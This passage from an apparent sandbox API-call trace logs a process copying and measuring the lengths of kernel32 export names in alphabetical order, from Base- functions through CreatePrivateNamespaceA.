lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.661] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.661] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.661] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.661] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.661] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.661] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.661] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.661] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.661] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.661] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.661] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.661] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.661] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.661] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.661] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.661] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.661] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.662] lstrlenA (lpString="BEEP") returned 4 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.662] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.662] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.662] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.662] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.662] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.662] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.662] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.662] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.662] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.662] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.662] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.662] lstrlenA (lpString="CANCELIO") returned 8 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.662] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.662] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.662] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.662] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.662] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.663] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.663] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.663] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.663] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.663] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.663] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.663] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.663] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.663] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.663] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.663] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.663] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.663] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.663] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.663] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.663] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.663] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.663] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.664] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.664] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.664] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.664] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.664] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.664] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.664] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.664] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.664] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.664] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.664] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.664] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.664] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.664] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.664] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.664] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.664] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.664] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.664] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.665] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.665] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.665] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.665] lstrlenA (lpString="COPYFILEA") returned 9 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.665] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.665] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.665] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.665] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.665] lstrlenA (lpString="COPYFILEW") returned 9 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.665] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.665] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.665] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.665] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.665] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.665] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.665] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.665] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.665] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.665] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.666] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.666] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.666] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.666] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.666] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.666] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.666] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.666] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.666] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.666] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.666] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.666] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.666] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.666] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.666] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.666] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.666] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.666] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.666] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.667] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.667] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.667] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.667] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.667] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.667] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.667] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.667] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.667] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.667] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.667] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.667] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.667] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.667] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.667] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.667] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.667] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.667] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") 